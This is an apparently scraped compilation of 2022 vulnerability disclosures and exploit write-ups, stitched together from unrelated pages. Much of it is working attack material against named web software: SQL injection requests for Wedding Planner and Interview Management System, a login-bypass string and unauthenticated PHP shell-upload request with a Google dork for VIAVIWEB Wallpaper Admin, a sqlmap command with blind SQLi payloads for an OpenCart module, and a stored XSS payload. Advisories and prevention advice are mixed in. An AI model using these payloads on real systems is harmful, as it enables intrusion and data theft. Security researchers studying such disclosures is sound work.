Wedding Planner v1.0 was discovered to contain a SQL injection vulnerability via the booking_id parameter at /admin/budget.php.

Permalink

Cannot retrieve contributors at this time

**Wedding Planner v1.0 by pushpam02 has SQL injection**

BUG\_Author: Ptanly

vendor: https://www.sourcecodester.com/php/15375/wedding-planner-project-php-free-download.html

Vulnerability File: /Wedding-Management-PHP/admin/budget.php?booking\_id=

Vulnerability url: http://ip/Wedding-Management-PHP/admin/budget.php?booking\_id=

\[+\] Payload: /Wedding-Management-PHP/admin/budget.php?booking\_id=31%20and%20length(database())%20=9&user\_id=31 // Leak place ---> booking\_id

dbname = dbwedding,length is 9

GET /Wedding\-Management\-PHP/admin/budget.php?booking\_id\=31%20and%20length(database())%20\=9&user\_id\=31 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ncd6h7doujvbbft46r0m7mbr6s
Connection: close

When length (database ()) = 8 

When length (database ()) = 9

CVE-2022-38509: bug_report/SQLi-1.md at main · ptanly/bug_report

A denial-of-service issue was discovered in MediaWiki 1.37.x before 1.37.2. Rendering of w/index.php?title=Special%3AWhatLinksHere&target=Property%3AP31&namespace=1&invert=1 can take more than thirty seconds. There is a DDoS risk.

Risk Rating

Low

Author Affiliation

WMF Technology Dept

*   Task Graph
*   Mentions

**Event Timeline**

Restricted Application added a subscriber: Aklapper.

Restricted Application added a project: wdwb-tech.

Ladsgroup added a parent task: Restricted Task.

sbassett triaged this task as Low priority.

sbassett changed Author Affiliation from N/A to WMF Technology Dept.

sbassett changed Risk Rating from N/A to Low.

Reedy renamed this task from Whatlinkshere of heavily used properties in wikidata can be easily utilized as a DDoS vector to CVE-2022-: Whatlinkshere of heavily used properties in wikidata can be easily utilized as a DDoS vector.

Reedy renamed this task from CVE-2022-: Whatlinkshere of heavily used properties in wikidata can be easily utilized as a DDoS vector to CVE-2022-28204: Whatlinkshere of heavily used properties in wikidata can be easily utilized as a DDoS vector.

CVE-2022-28204: Whatlinkshere of heavily used properties in wikidata can be easily utilized as a DDoS vector

Interview Management System v1.0 was discovered to contain a SQL injection vulnerability via the component /interview/delete.php?action=deletecand&id=.

**Interview Management System v1.0 by janobe has SQL injection**

BUG\_Author: yuanqiu

Login account: janobe@janobe.com/janobe (Super Admin account)

vendors: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /interview/delete.php?action=deletecand&id=

Vulnerability location: /interview/delete.php?action=deletecand&id=, id

dbname =sourcecodester\_interviewdb

\[+\] Payload: /interview/delete.php?action=deletecand&id=(updatexml(1,concat(0x7e,(select%20database()),0x7e),0)) // Leak place ---> id

GET /interview/delete.php?action\=deletecand&id\=(updatexml(1,concat(0x7e,(select%20database()),0x7e),0)) HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=fjhrjdpuej6edqv5haoadpj3lc
Connection: close

CVE-2022-38576: bug_report/SQLi-1.md at main · gith-boot/bug_report

VIAVIWEB Wallpaper Admin suffers from remote shell upload and remote SQL injection vulnerabilities.

    ```# Exploit Title: [VIAVIWEB Wallpaper Admin - Multiple vulnrabilities]# Google Dork: intext:"Wallpaper Admin"   "LOGIN" "password" "Username"# Date: [18/09/2022]# Exploit Author: [Edd13Mora]# Vendor Homepage: [www.viaviweb.com]# Version: [N/A]# Tested on: [Windows 11 - Kali Linux]------------------SQLI on the Login page------------------payload --> admin' or 1=1-- ----POC:---[1] Disable JavaScript on ur browser put the payload and submit[2] Reactive JavaScript and resend the request---------------------------Authenticated SQL Injection:---------------------------Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/edit_gallery_image.php?img_id=[number]-----------------------------------------------Remote Code Execution (RCE none authenticated):-----------------------------------------------Poc:----Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/add_gallery_image.php?add=yes--------------------Burp Request :--------------------POST /hd_wallpaper/add_gallery_image.php?add=yes HTTP/2Host: http://googlezik.freehostia.comCookie: _octo=GH1.1.993736861.1663458698; PHPSESSID=qh3c29sbjr009jdg8oraed4o52User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------33893919268150571572221367848Content-Length: 467Origin: http://googlezik.freehostia.comReferer: http://googlezik.freehostia.com/hd_wallpaper/add_gallery_image.php?add=yesUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailers-----------------------------33893919268150571572221367848Content-Disposition: form-data; name="category_id"1-----------------------------33893919268150571572221367848Content-Disposition: form-data; name="image[]"; filename="poc.php"Content-Type: image/png<?php phpinfo(); ?>-----------------------------33893919268150571572221367848Content-Disposition: form-data; name="submit"-----------------------------33893919268150571572221367848--Uploaded File can be found here :--------------------------------http://localhost/PAth-Where-Script-Installed/categories/```

VIAVIWEB Wallpaper Admin SQL Injection / Shell Upload

/vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module for GLPI through 10.0.2 allows PHP code injection.

Absent directory?: .

/

.

/

internal\_utilities

/

htmLawed?cve=title

/

Directory specified probably doesn't exist, or is not a directory, or could not be accessed, possibly because of file-permission or server configuration issues

Go to root

CVE-2022-35914: absent?: ././internal_utilities/htmLawed?cve=title/ | PHP Labware source code viewer

Zentao Demo15 is vulnerable to Directory Traversal. The impact is: obtain sensitive information (remote). The component is: URL : view-source:https://demo15.zentao.pm/user-login.html/zentao/index.php?mode=getconfig.

_I am Shubham Sudhir Sawant a Security Researcher, super thrilled to write my very first blog. Medium is one of my favorite platform where I can read on Security Bug blogs. I came across so many great contents which made me write one today. It not only helps us grow our knowledge or built our skill set in a particular field but also in exploring new ideas and think out of the box._

This article gives a walk through on what directory traversal is, explains how to perform path traversal attack, and elucidate how to prevent directory traversal vulnerability.

> **_What is Directory Traversal?_**

Path Traversal alias Directory Traversal, is a web related vulnerability that allows an attacker to read arbitrary files on the server running an application. (Example: application assets, backend systems credentials, and sensitive operating system files). In certain cases, an attacker can potentially tamper the arbitrary file on the server, which eventually give full control over the server running the application.

> **_Read arbitrary file through directory traversal_**

The Basic Steps are given below:

1\. Shoot up **Burp Professional** Suite/ **Burp Community** Edition Tool on your browser.

2\. Open The Web Application which has to be intercepted in burp Intercept **proxy tab**.

3\. Now before intercepting, set the proxy in web browser **network setting**.

4\. Open the burp tool and enable the **proxy intercept** tab.

5\. The request URL will be captured and send it to the **repeater** to launch the attack.

6\. Look for an Crawled Website(performed in repeater tab)

In Crawled Website I found the below URL:-

https://demo15.zentao.pm/user-login.html/zentao/index.php?mode=getconfig

Figure 1: File Path Traversal Simple Example

{“version”:”16.5",”requestType”:”PATH\_INFO”,”requestFix”:”-”,”moduleVar”:”m”,”methodVar”:”f”,”viewVar”:”t”,”sessionVar”:”zentaosid”,”systemMode”:”new”,”sprintConcept”:”0",”URAndSR”:”0",”sessionName”:”zentaosid”,”sessionID”:”vgpgn3knuc5g2jod6uptc8db42",”random”:7923,”expiredTime”:”1440",”serverTime”:1663360511,”rand”:7923}

I found it is a sensitive config file which is getting executed for which was assigned a CVE-2022–37700

> **_How to prevent a directory traversal attack?_**

Although there are many ways in which the security professionals can avoid the possibility of path traversal attack some preventive measure are listed below: which includes..

1\. User supplied dynamic input should be strictly validated before being passed to any filesystem operation. After validating user input, the application can use a suitable filesystem API to verify that the file to be accessed is actually located within the base directory used by the application.

2\. Input containing dot-dot-slash sequences should be blocked.

3\. Also, the directory used to store files that are accessed using user supplied dynamic input can be located on a separate logical volume to other sensitive application and operating system files, so that these cannot be reached via path traversal attacks.

4\. If user provided data passed to input filesystem APIs is unavoidable then 2 layers of defense should be used together such as:

\- 1st step : The application should validate user input before processing it. This done by comparing to the whitelist of permitted values. If this is not possible then it should be validated based of “alphanumeric characters.”

\- 2nd step: After validation the application should append the input to the base directory and use a platform filesystem API to canonicalize the path.

**_For example: A java code to validate the canonical path of a file based on user input:_**

File f = new File (base\_Dir, user\_Input);

If (f.getCanonicalPath() .startsWith(base\_Dir))

{

//process file

}

5\. The developer should avoid storing sensitive data in the web root of the application.

6\. It is advisable to run the latest version of these web servers because by default it will have good directory security, if possible one can make sure that they are running the latest version (up- to-date with current patches).

> **_References_**

1\. https://portswigger.net/web-security/file-path-traversal

2\. https://www.acunetix.com/websitesecurity/directory-traversal/

3\. https://portswigger.net/daily-swig/patched-wordpress-plugin-still-susceptible-to-attacks

4\. https://portswigger.net/daily-swig/vulnerability-found-in-oracle-pos-terminals

5\. https://owasp.org/www-project-web-security-testing-guide/latest/4-Web\_Application\_Security\_Testing/05-Authorization\_Testing/01-Testing\_Directory\_Traversal\_File\_Include

CVE-2022-37700: CVE-2022–37700 Directory Transversal in ZenTao Easy soft ALM v16.5

The folioupdate service in Fabasoft Cloud Enterprise Client 22.4.0043 allows Local Privilege Escalation.

################################################################################ # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ################################################################################ # # Product: Fabasoft Cloud Enterprise Client # Vendor: Fabasoft # CSNC ID: CSNC-2022-010 # CVE ID: CVE-2022-29908 # Subject: Local Privilege Escalation # Risk: High # Effect: Locally exploitable # Authors: Tino Kautschke # Date: 14.09.2022 # ################################################################################ Introduction: ------------- The Fabasoft Cloud lets you create a digital business network for your company based on relationships of trust – for secure cross-company, transnational collaboration in the cloud. Fabasoft provides a native client that allows, for example, editing documents directly via the web client or synchronizing documents on the device. \[1-3\] Compass Security identified a local privilege escalation vulnerability, allowing a user on a system with the Fabasoft Cloud Enterprise Client installed, to escalate their privileges to local administrator. Affected: --------- Vulnerable: \* Fabasoft Cloud Enterprise Client 22.4.0043 No other version was tested, but it is possible for older versions to be vulnerable. Not vulnerable: \* Fabasoft Cloud Enterprise Client 22.4.0045 Other products were affected (Windows only) \[4\]: Fabasoft Folio / Fabasoft eGov-Suite 2021 UR3, Fabasoft Folio / Fabasoft eGov-Suite 2022, Fabasoft Business Process Cloud Technical Description: ---------------------- The Fabasoft Cloud Enterprise Client uses an update service named FabasoftCloudUS.exe, which is executed with SYSTEM privileges. On update, it looks for new update files in C:\\ProgramData\\fabasoft.plugin, which can be read and written to by arbitrary users. The update service expects a signed MSI file and an empty file with extension '.pending' in this folder to start the update process. The validation check for signed MSI files is vulnerable. It is possible to sign an arbitrary MSI package with a self-signed certificate containing Fabasoft's information in the certificate fields. The validation check will accept the self-signed MSI package and start the setup process with SYSTEM privileges. This means that an unprivileged user can execute arbitrary MSI packages, thus resulting in code execution with full SYSTEM permissions. This can be, e.g., exploited by executing a reverse shell or other malicious commands. Workaround / Fix: ----------------- The validation process for signed MSI files should be revised to ensure that it is not possible to install packages from untrusted sources. A patch has already been released by the publisher. \[4\] The update service should not run in a high privileged context like SYSTEM. It is recommended to set up a dedicated service user with neccessary privileges only. As a customer using the Fabasoft Cloud Enterprise Client, update your installation to the latest version. Workaround: disable Fabasoft Folio Client Update Service "folioupdate". Timeline: --------- 2022-04-13: Discovery by Tino Kautschke 2022-04-13: Initial vendor notification 2022-04-21: Fabasoft public announcement and release of fixed version 2022-04-29: Vulnerability registered as CVE-2022-29908 2022-09-14: Coordinated disclosure of the advisory References: ----------- \[1\] https://help.cloud.fabasoft.com/index.php?topic=doc/User-Help-Fabasoft-Cloud-eng/introduction.htm \[2\] https://help.cloud.fabasoft.com/index.php?topic=doc/Fabasoft-Cloud-Client/introduction.htm \[3\] https://help.cloud.fabasoft.com/index.php?topic=doc/Technical-Information-eng/the-fabasoft-cloud-enterprise-client.htm \[4\] https://www.fabasoft.com/en/support/knowledgebase/client-autoupdate-harmful-code-installation-vulnerability-fsc33251

CVE-2022-29908

Red Hat Security Advisory 2022-6541-01 - PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. Issues addressed include file overwrite and traversal vulnerabilities.

Red Hat Security Advisory 2022-6541-01

OpenCart 3.x Newsletter Custom Popup module version 4.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: OpenCart v3.x So Newsletter Custom Popup Module - Blind SQL Injection# Date: 18/09/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.opencart.com/# Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=40259&filter_search=newsletter&filter_license=1&sort=date_added# Version: v.4.0# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz* Description :So Newsletter Custom Popup Module is compatible with any Opencart allows SQL Injection via parameter 'email' in index.php?route=extension/module/so_newletter_custom_popup/newsletter. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.* Steps to Reproduce :- Go to : http://127.0.0.1/index.php?route=extension/module/so_newletter_custom_popup/newsletter- Save request in BurpSuite- Run saved request with : sqlmap -r sql.txt -p email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbsRequest :===========POST /index.php?route=extension/module/so_newletter_custom_popup/newsletter HTTP/1.1Content-Type: application/x-www-form-urlencodedCookie: OCSESSID=aaf920777d0aacdee96eb7eb50Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflateContent-Length: 29Host: 127.0.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Connection: Keep-alivecreatedate=2022-8-28%2019:4:6&email=hi&status=0===========Output :Parameter: #1* ((custom) POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: createdate=2022-8-28 19:4:6&email=hi' AND 4805=4805-- nSeP&status=0    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: createdate=2022-8-28 19:4:6&email=hi' AND (SELECT 4828 FROM(SELECT COUNT(*),CONCAT(0x7176627071,(SELECT (ELT(4828=4828,1))),0x7178786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sRQS&status=0

OpenCart 3.x Newsletter Custom Popup 4.0 SQL Injection

WordPress GetYourGuide Ticketing plugin version 1.0.1 suffers from a persistent cross site scripting vulnerability.

    # *Exploit Title*: WordPress Plugin ‘GetYourGuide Ticketing’  - StoredCross-Site Scripting# Date: 18-09-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage:https://wordpress.org/plugins/search/GetYourGuide+Ticketing/# Version: 1.0.1# Tested on: Firefox# Contact me: mariamtariq404@gmail.com# *Vulnerable code*:``` <input type="text" name="partner_hash" value="<?php echo $partner_hash?>"></input> ```# *POC*:1- Install the plugin ‘GetYourGuide Ticketing’ & activate it.2- Navigate toward the GYG-Ticketing3- Enter the XSS payload ` “><img src=x onerror=alert(1)>`4- Go to link builder to verify the XSS pop-up.#* POC image*:https://imgur.com/amrDhIt

Tag

#php